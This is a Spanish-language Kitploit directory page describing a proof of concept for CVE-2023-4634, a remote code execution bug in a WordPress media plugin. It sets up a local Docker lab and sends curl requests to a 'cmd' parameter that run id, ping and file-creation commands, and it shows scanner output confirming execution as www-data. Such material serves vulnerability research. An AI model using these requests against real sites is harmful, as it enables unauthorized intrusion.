Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-4634-PoC | Kitploit
Herramientas/GitHubGitHub/evillm/cve-2023-4634-poc
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubevillm/cve-2023-4634-poc

CVE-2023-4634-PoC

Ver Repositorio
hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-4634 - Vulnerabilidad RCE en el plugin de WordPress Media Library Assistant

1. Construcción y puesta en marcha del entorno

root@kitploit:~
cd Stand
docker-compose up --build -d

2. Espera a que los servicios estén listos (60 segundos)

root@kitploit:~
sleep 60
curl -I http://localhost:8080

3. Ejecutar el escaneo de vulnerabilidad

root@kitploit:~
cd ../PoC/src
python3 scanner.py http://localhost:8080

4. Prueba manual de RCE

root@kitploit:~
# Prueba del comando id
curl "http://localhost:8080/rce_proof.php?cmd=id"

# Prueba del comando ping
curl "http://localhost:8080/rce_proof.php?cmd=ping+-c+2+127.0.0.1"

# Crear archivo de prueba
curl "http://localhost:8080/rce_proof.php?cmd=touch+/tmp/rce_proof"

✅ Resultados esperados

Salida de scanner.py:

root@kitploit:~
[*] Scanning: http://localhost:8080
[+] WordPress is accessible
[+] Plugin found: v3.09
[+] Plugin is VULNERABLE!
[*] Testing RCE...
[+] id command executed
[+] ping command executed
[+] file_check command executed
[+] RCE CONFIRMED!
[+] Results saved to ../result.txt

Contenido de result.txt:

root@kitploit:~
{
  "cve": "CVE-2023-4634",
  "target": "http://localhost:8080",
  "timestamp": "2025-12-21 13:49:19",
  "vulnerable": true,
  "findings": {
    "wordpress": true,
    "plugin_vulnerable": true,
    "rce_id": true,
    "rce_id_output": "uid=33(www-data) gid=33(www-data) groups=33(www-data)",
    "rce_ping": true,
    "rce_file_check": true
  },
  "plugin_version": "3.09",
  "status": "VULNERABLE"
}

🔧 Especificaciones técnicas

Red:

  • WordPress: 172.20.0.2:80 (disponible en localhost:8080)
  • Base de datos: 172.20.0.3:3306
  • Red: 172.20.0.0/24

Requisitos:

  • CVE: CVE-2023-4634
  • Componente vulnerable: Plugin Media Library Assistant < 3.10
  • Tipo de vulnerabilidad: Ejecución remota de código (RCE)
  • Requisitos del sistema: Docker, Python 3.7+

📊 Evidencia de RCE

  • ✅ Ejecución del comando id vía HTTP
  • ✅ Ejecución del comando ping vía HTTP
  • ✅ Creación de archivos en /tmp/
  • ✅ Confirmación de privilegios www-data
  • ✅ Resultados documentados en result.txt

🧹 Limpieza

root@kitploit:~
cd Stand
docker-compose down -v
Descargar herramienta